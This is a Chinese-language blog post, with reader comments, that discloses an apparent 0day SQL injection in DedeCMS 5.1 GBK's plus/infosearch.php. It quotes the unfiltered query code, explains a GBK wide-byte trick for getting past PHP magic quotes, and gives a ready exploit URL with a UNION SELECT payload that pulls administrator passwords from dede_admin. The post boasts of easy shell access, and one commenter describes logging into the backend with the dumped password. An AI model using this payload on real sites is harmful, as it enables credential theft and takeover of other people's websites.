dedecms gbk版0day

原文

一个月前看了看了dedecms代码(只看了plus下的文件),发现有些变量人为控制没有过滤,但是在php的魔法引号这道天然屏障面前利用几率不好,但是联想到gbk的宽字符,突破方法就有了.

漏洞文件:plus/infosearch.php

测试版本:5.1 gbk

描述:$q变量没有过滤直接进入查询,导致注入出现。代码如下:

PHP代码

$q = trim($q);
if($areaid > 0) {
$wheresql = "areaid=$areaid and ";
}

$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";

$dlist = new DataList();

$dlist->pageSize = 20;
$dlist->SetParameter("q",$q);
$dlist->SetParameter("action",'search');
$dlist->SetParameter("areaid",$areaid);
$dlist->SetSource($query);

“‘”突破了,那就照常注入。

测试站:
http://www.xxx.com/plus/infosearch.php?action=search&q=%cf’%20union%20select%201,2,id,4,pwd,6%20from%20dede_admin/*

至于后台拿shell,找不到后台的一样可以轻松拿到shell.不会的留言。

还有几个文件存在注入问题,象feedback.php,后续发放分析。

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

  • 中国龙少

    能不能有一个利用方法呢?或者说具体怎么利用这个漏洞拿shell呢?谢谢!

  • 飞鱼

    找不到后台如何搞呀?

  • applychen

    dedecms的后台容易得shell,看这个利用方法就是暴管理员密码进后台

  • info

    找不到后台怎么搞啊?

发表评论